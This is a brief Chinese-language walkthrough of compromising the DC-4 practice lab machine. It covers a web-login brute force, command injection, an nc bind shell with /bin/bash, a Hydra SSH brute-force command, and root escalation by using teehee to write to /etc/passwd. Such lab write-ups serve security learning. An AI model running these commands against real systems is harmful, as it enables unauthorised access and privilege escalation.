靶机:DC-4 测试机:kali(IP:192.168.186.128),win10
网站主页
尝试爆破kali字典/usr/share/wordlists/rockyou.txt.gz;用户名:admin 密码:happy 疑似命令执行,抓包查看
修改参数尝试命令执行漏洞
Nc -lvp 8888 -t -e /bin/bash 反弹shell客户端nc 192.168.186.252 8888 连接
/home/jim/backups发现曾用密码 python开启一个简易http服务, wget下载
Hydra -l jim -P passwd.txt -vV -e ns 192.168.186.252 ssh 尝试爆破ssh成功登录,在/var/mail下发现邮件有用户名密码 su charles尝试切换用户登录 Sudo -l 查看可以root执行的命令 Teehee修改添加用户/etc/passwd
登录口尝试爆破,进入后尝试寻找漏洞,利用nc反弹shell,拿到shell后寻找用户邮箱,曾用相关密码,进行hydra ssh爆破,sudo -l 查看可以root身份执行的命令,结合teehee命令修改/etc/passwd进行提权。